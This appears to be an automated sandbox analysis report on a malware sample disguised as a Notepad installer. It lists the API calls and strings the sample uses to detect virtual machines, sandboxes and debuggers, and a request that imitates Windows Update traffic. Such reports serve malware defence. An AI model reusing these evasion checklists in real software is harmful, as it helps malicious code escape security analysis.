                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0

                                      APIs
                                      • LoadLibraryA.KERNELBASE(?), ref: 006E630D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0

                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,006E823A), ref: 006EC7AE
                                      • GetProcAddress.KERNEL32(00000000,ZwClose), ref: 006EC7BE
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryObject), ref: 006EC7CB
                                      • GetProcAddress.KERNEL32(00000000,ZwYieldExecution), ref: 006EC7D8
                                      • GetProcAddress.KERNEL32(00000000,ZwCreateDebugObject), ref: 006EC7E5
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 006EC7F2
                                      • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 006EC7FF
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationThread), ref: 006EC80C
                                      • GetProcAddress.KERNEL32(00000000,ZwSetInformationThread), ref: 006EC819
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryDirectoryObject), ref: 006EC826
                                      • GetProcAddress.KERNEL32(00000000,ZwOpenDirectoryObject), ref: 006EC833
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,006E823A), ref: 006EC83F
                                      • GetProcAddress.KERNEL32(00000000,GetSystemFirmwareTable), ref: 006EC84D
                                      • GetProcAddress.KERNEL32(00000000,EnumSystemFirmwareTables), ref: 006EC85A
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006EC867
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006EC874
                                      • LoadLibraryW.KERNEL32(PowrProf.dll,?,006E823A), ref: 006EC880
                                      • GetProcAddress.KERNEL32(00000000,GetPwrCapabilities), ref: 006EC890
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule$LibraryLoad
                                      • String ID: EnumSystemFirmwareTables$GetPwrCapabilities$GetSystemFirmwareTable$PowrProf.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$ZwClose$ZwCreateDebugObject$ZwOpenDirectoryObject$ZwQueryDirectoryObject$ZwQueryInformationProcess$ZwQueryInformationThread$ZwQueryObject$ZwQuerySystemInformation$ZwSetInformationThread$ZwYieldExecution$kernel32.dll$ntdll.dll
                                      • API String ID: 551388010-37680696

                                      APIs
                                      • rand.MSVCRT ref: 006E399B
                                      • memset.NTDLL ref: 006E39BD
                                      • GetUserDefaultLangID.KERNEL32(00000059,?,00000010), ref: 006E39D3
                                      • GetLocaleInfoW.KERNEL32(?), ref: 006E39DF
                                      • GetUserDefaultLangID.KERNEL32(0000005A,?,00000010), ref: 006E39E9
                                      • GetLocaleInfoW.KERNEL32(?), ref: 006E39EF
                                      • _snwprintf.NTDLL ref: 006E3A07
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000020,00000000,00000000), ref: 006E3A29
                                      • _snprintf.NTDLL ref: 006E3AC6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DefaultInfoLangLocaleUser$ByteCharMultiWide_snprintf_snwprintfmemsetrand
                                      • String ID: %s-%s$:o$CSRF-TOKEN=%s; LANG=%s$Connection$Cookie$GET$Host$User-Agent$X-CSRF-TOKEN$Z$catalog.s.download.windowsupdate.com$close$curl/5.9$dEo$:o$Bo
                                      • API String ID: 1200320670-2946613083

                                      APIs
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 006EB5C6
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 006EB5D9
                                      • PathCombineW.SHLWAPI(?,?,006F5C24,00000000,006EB649), ref: 006EB5F7
                                      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 006EB624
                                      Strings
                                      • System32\vboxoglpackspu.dll, xrefs: 006EB5A0
                                      • System32\vboxdisp.dll, xrefs: 006EB568
                                      • System32\drivers\VBoxMouse.sys, xrefs: 006EB54C
                                      • System32\vboxservice.exe, xrefs: 006EB5AE
                                      • System32\vboxogl.dll, xrefs: 006EB57D
                                      • System32\VBoxControl.exe, xrefs: 006EB5BC
                                      • System32\drivers\VBoxVideo.sys, xrefs: 006EB561
                                      • System32\vboxtray.exe, xrefs: 006EB5B5
                                      • System32\vboxoglerrorspu.dll, xrefs: 006EB592
                                      • System32\vboxmrxnp.dll, xrefs: 006EB576
                                      • System32\vboxoglpassthroughspu.dll, xrefs: 006EB5A7
                                      • System32\vboxoglcrutil.dll, xrefs: 006EB58B
                                      • System32\drivers\VBoxGuest.sys, xrefs: 006EB553
                                      • System32\vboxhook.dll, xrefs: 006EB56F
                                      • System32\vboxoglarrayspu.dll, xrefs: 006EB584
                                      • System32\drivers\VBoxSF.sys, xrefs: 006EB55A
                                      • System32\vboxoglfeedbackspu.dll, xrefs: 006EB599
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Wow64$Redirection$AddressCombineCurrentDirectoryDisableHandleModulePathProcProcessRevertWindows
                                      • String ID: System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                                      • API String ID: 1174745796-2122297659

                                      APIs
                                      • SetupDiGetClassDevsW.SETUPAPI(006F32A0,00000000,00000000,00000002), ref: 006EAABD
                                      • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 006EAADF
                                      • SetupDiGetDeviceRegistryPropertyW.SETUPAPI(?,0000001C,00000001,?,00000000,?,?), ref: 006EAB10
                                      • GetLastError.KERNEL32 ref: 006EAB16
                                      • LocalFree.KERNEL32(00000000), ref: 006EAB26
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 006EAB34
                                      • StrStrIW.SHLWAPI(00000000,vbox), ref: 006EAB4C
                                      • StrStrIW.SHLWAPI(00000000,vmware), ref: 006EAB58
                                      • StrStrIW.SHLWAPI(00000000,qemu), ref: 006EAB64
                                      • StrStrIW.SHLWAPI(00000000,virtual), ref: 006EAB70
                                      • SetupDiEnumDeviceInfo.SETUPAPI(?,00000000,0000001C), ref: 006EAB83
                                      • LocalFree.KERNEL32(00000000), ref: 006EABA1
                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 006EABAA
                                      • GetLastError.KERNEL32 ref: 006EABB6
                                      • GetLastError.KERNEL32 ref: 006EABBC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Setup$Device$ErrorInfoLastLocal$EnumFree$AllocClassDestroyDevsListPropertyRegistry
                                      • String ID: qemu$vbox$virtual$vmware
                                      • API String ID: 3271178798-2646423876

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrCmpIW.SHLWAPI(?,System), ref: 006EBEA3
                                      • VariantClear.OLEAUT32(?), ref: 006EBEB5
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 006EBED8
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 006EBEE8
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 006EBEF4
                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 006EBF11
                                      • lstrcmpiW.KERNEL32(?,006F60C8), ref: 006EBF22
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 006EBF4E
                                      • VariantClear.OLEAUT32(?), ref: 006EBF58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$ArraySafe$AllocFree$BoundClearDataVariant$AccessElementUnaccesslstrcmpi
                                      • String ID: FileName$ROOT\CIMV2$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$vboxvideo
                                      • API String ID: 2291613145-3433602254

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,006F5418,00000000,00020019,?), ref: 006EB1EA
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EB20C
                                      • malloc.MSVCRT ref: 006EB21E
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB22E
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006EB250
                                      • StrStrIW.SHLWAPI(00000000,006F51A0), ref: 006EB266
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EB295
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB29F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$??3@EnumInfoOpenQuerymalloc
                                      • String ID: System\CurrentControlSet\Enum\IDE$System\CurrentControlSet\Enum\SCSI$VMW$Virtual$qemu$vbox$virtio$vmware$xen
                                      • API String ID: 266897880-373962024
                                      • Opcode ID: b37b1a70f3bae7ef0b8bf4ff2261ebd74a2b0b614550e987dc66add71be42582
                                      • Instruction ID: 30eeac86aa78fc0858977e83253a38ceb6d294bf5e8bda73ccbec84d8415b3cc
                                      • Opcode Fuzzy Hash: b37b1a70f3bae7ef0b8bf4ff2261ebd74a2b0b614550e987dc66add71be42582
                                      • Instruction Fuzzy Hash: B441E571D02229EFDB118F96D8489FFBFBAFF05755B10505AE616A6210D3B04A44CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA107
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA11E
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA134
                                      • GlobalGetAtomNameW.KERNEL32(00000000,00000000,00000001), ref: 006EA145
                                      • GetEnvironmentVariableW.KERNEL32(%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%,00000000,01000000), ref: 006EA15F
                                      • GetBinaryTypeW.KERNEL32(%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%,00000000), ref: 006EA174
                                      • HeapQueryInformation.KERNEL32(00000000,00000045,00001000,00001000,00000000), ref: 006EA191
                                      • ReadProcessMemory.KERNEL32(000000FF,69696969,00001000,00001000,00000000), ref: 006EA1AD
                                      • GetThreadContext.KERNEL32(000000FF,?), ref: 006EA1C2
                                      • GetWriteWatch.KERNEL32(00000000,006EA0E7,00000000,00000000,00000000,?), ref: 006EA1DE
                                      • GetWriteWatch.KERNEL32(00000000,00001000,00001000,?,?,?), ref: 006EA209
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA233
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA23B
                                      Strings
                                      • %ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%, xrefs: 006EA16F
                                      • %ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%, xrefs: 006EA15A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocWatchWrite$AtomBinaryContextEnvironmentGlobalHeapInformationMemoryNameProcessQueryReadThreadTypeVariable
                                      • String ID: %ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%$%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%
                                      • API String ID: 856979550-3886066446
                                      • Opcode ID: 4cea89b9dd1df28ac1a49e07dad39235c81d16f7b38315f1492f75423d5e144b
                                      • Instruction ID: ddf6a37709b84f5541b7028307f5fba2d67e3ffc6aa92d2c32bb17d430b3af6d
                                      • Opcode Fuzzy Hash: 4cea89b9dd1df28ac1a49e07dad39235c81d16f7b38315f1492f75423d5e144b
                                      • Instruction Fuzzy Hash: 6841F8313403567FE7209FA29C49FBBBB6EEB81F94F150518B700E11D0DA62A844DB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E68D5: memset.NTDLL ref: 006E6902
                                        • Part of subcall function 006E68D5: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000002), ref: 006E6930
                                        • Part of subcall function 006E68D5: VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 006E6949
                                      • GetCurrentProcess.KERNEL32(00000018,006F2FB8,00000004,?,00000000,?,00000000), ref: 006E69C1
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E69C8
                                      • SysAllocString.OLEAUT32(006E34CD), ref: 006E6A40
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A47
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A4F
                                      • SysAllocString.OLEAUT32(open), ref: 006E6A59
                                      • VariantInit.OLEAUT32(?), ref: 006E6A92
                                      • VariantInit.OLEAUT32(?), ref: 006E6A98
                                      • VariantInit.OLEAUT32(?), ref: 006E6A9E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocString$InitVariant$Process$ConditionCurrentInfoInformationMaskQueryVerifyVersionmemset
                                      • String ID: open
                                      • API String ID: 2277313411-2758837156
                                      • Opcode ID: fe0cb6f602093a9447ebb4897d5a421bd5693e4dc9115a146d7a2e81c775470b
                                      • Instruction ID: 2d19a01bde90864b866061693f3848648f5a0e732ed45eeeaf6da69da96d72bd
                                      • Opcode Fuzzy Hash: fe0cb6f602093a9447ebb4897d5a421bd5693e4dc9115a146d7a2e81c775470b
                                      • Instruction Fuzzy Hash: C5512772D11668EBDF11EFA9DC859AEBBBABF08350F14012AF900E7250EB715845CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PathFindFileNameW.SHLWAPI(00780065), ref: 006EA4C2
                                      • lstrcmpiW.KERNEL32(006F4DA0,00000000), ref: 006EA4D4
                                      • PathRemoveExtensionW.SHLWAPI(00000000), ref: 006EA4E6
                                      • lstrlenW.KERNEL32(00000000), ref: 006EA4F3
                                      • lstrlenW.KERNEL32(00000000), ref: 006EA4FB
                                      • lstrlenW.KERNEL32(00000000), ref: 006EA503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Path$ExtensionFileFindNameRemovelstrcmpi
                                      • String ID: bot.exe$klavme.exe$malware.exe$myapp.exe$sample.exe$sandbox.exe$test.exe$testapp.exe
                                      • API String ID: 3403677523-863941656
                                      • Opcode ID: db7f45093fe1e602e7be7fac52e71062e4e67e547b79ce966f621195ffd7abfb
                                      • Instruction ID: 6e035bccde762ce64722e28bc66d170778525bfd3ffb0873ecf9393e427e58c8
                                      • Opcode Fuzzy Hash: db7f45093fe1e602e7be7fac52e71062e4e67e547b79ce966f621195ffd7abfb
                                      • Instruction Fuzzy Hash: B511C1719023499BCB11DFA6DC889BFBFFABF49705B100418E601E7610DB749A45CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _open_readcallocmallocmemcpy
                                      • String ID:
                                      • API String ID: 3792786917-0
                                      • Opcode ID: e3ce8cbc618d705375c52b41698766bb3485c21fd7e5cc8ca773cbdfeb64646a
                                      • Instruction ID: 5257884f3d9e0f8c53abc5f2577ab6bd16892c8337c5b55fc42040c9d18c7db4
                                      • Opcode Fuzzy Hash: e3ce8cbc618d705375c52b41698766bb3485c21fd7e5cc8ca773cbdfeb64646a
                                      • Instruction Fuzzy Hash: A2125B716083418FC710DF28C58472FBBE1BF88704F19896EE894AB391D778E945CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,VBOX), ref: 006EBA40
                                      • VariantClear.OLEAUT32(?), ref: 006EBA4D
                                      • StrStrW.SHLWAPI(?,VBOX), ref: 006EBA83
                                      • VariantClear.OLEAUT32(?), ref: 006EBA90
                                      • StrStrW.SHLWAPI(?,VEN_VBOX), ref: 006EBAC6
                                      • VariantClear.OLEAUT32(?), ref: 006EBAD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocClearFreeVariant
                                      • String ID: Caption$Name$PNPDeviceID$ROOT\CIMV2$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX
                                      • API String ID: 1665868789-759396408
                                      • Opcode ID: 0879bc8f5cae9ec2501d3cb0ec0c559a789172c773b0c53897e14140110eccf0
                                      • Instruction ID: a6f6f41a313ec406983ce9678050e1b364dfb11aa517f95c77f2dc089e5d29d6
                                      • Opcode Fuzzy Hash: 0879bc8f5cae9ec2501d3cb0ec0c559a789172c773b0c53897e14140110eccf0
                                      • Instruction Fuzzy Hash: B0512776901259AB8F10DBDACC84DEFBBBEEF48710B145469F602EB250DB709E41CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,VMWare), ref: 006EAFDF
                                      • StrStrIW.SHLWAPI(?,Xen), ref: 006EAFED
                                      • StrStrIW.SHLWAPI(?,innotek GmbH), ref: 006EAFFB
                                      • StrStrIW.SHLWAPI(?,QEMU), ref: 006EB009
                                      • VariantClear.OLEAUT32(00000008), ref: 006EB013
                                      • VariantClear.OLEAUT32(00000008), ref: 006EB02D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: Manufacturer$QEMU$ROOT\CIMV2$SELECT * FROM Win32_ComputerSystem$VMWare$Xen$innotek GmbH
                                      • API String ID: 261499160-1768686787
                                      • Opcode ID: 763275c2bcad26ac6ac7a2b3227200443c090e0ae43350e063f3054b4bb5a7a3
                                      • Instruction ID: 5dd77d7653407450481b6cba4290455a27a6c1fe686cb902cd7234d5821340b3
                                      • Opcode Fuzzy Hash: 763275c2bcad26ac6ac7a2b3227200443c090e0ae43350e063f3054b4bb5a7a3
                                      • Instruction Fuzzy Hash: 4C410871901219EFCB10DB99CC84DEFBBBAEF08704B140065E615E7251DB71AE45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,006E34BF), ref: 006E3F7E
                                      • malloc.MSVCRT ref: 006E3F83
                                      • NtQuerySystemInformation.NTDLL(00000005,00000000,006E34BF,?), ref: 006E3F9D
                                      • GetCurrentProcess.KERNEL32(?,?,?,006E34BF), ref: 006E3FA9
                                        • Part of subcall function 006E4016: NtQueryInformationProcess.NTDLL(?,00000018,?,00000004,006E3FB1), ref: 006E4029
                                      • lstrcmpiW.KERNEL32(?,explorer.exe,?,?,?,006E34BF), ref: 006E3FBF
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,006E34BF), ref: 006E3FD2
                                      • GetCurrentProcess.KERNEL32(?,?,?,006E34BF), ref: 006E3FDE
                                      • CloseHandle.KERNEL32(00000000,?,?,?,006E34BF), ref: 006E3FF4
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E4007
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$InformationQuery$CurrentSystem$??3@CloseHandleOpenlstrcmpimalloc
                                      • String ID: explorer.exe
                                      • API String ID: 4001965484-3187896405
                                      • Opcode ID: 05a10ee9c1670984d2f9577ce466e00341f2655323bbef4fff70eed9feef274b
                                      • Instruction ID: 9a336e3bfe9785edeb386503439f8d40b4e6204977d6b5085b8f96c3d6b3a815
                                      • Opcode Fuzzy Hash: 05a10ee9c1670984d2f9577ce466e00341f2655323bbef4fff70eed9feef274b
                                      • Instruction Fuzzy Hash: AD11607190035AAFDB109FA6DC449AEBBBAEF44759F110469FA01E3250EB718E00DF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 006E9AF3
                                      • NtSetInformationThread.NTDLL(00000000), ref: 006E9AF6
                                      • NtSetInformationThread.NTDLL(0000FFFF,00000011,00000000,00000000), ref: 006E9B0C
                                      • GetCurrentThread.KERNEL32 ref: 006E9B1D
                                      • NtSetInformationThread.NTDLL(00000000), ref: 006E9B20
                                      • GetCurrentThread.KERNEL32 ref: 006E9B37
                                      • NtQueryInformationThread.NTDLL(00000000), ref: 006E9B3A
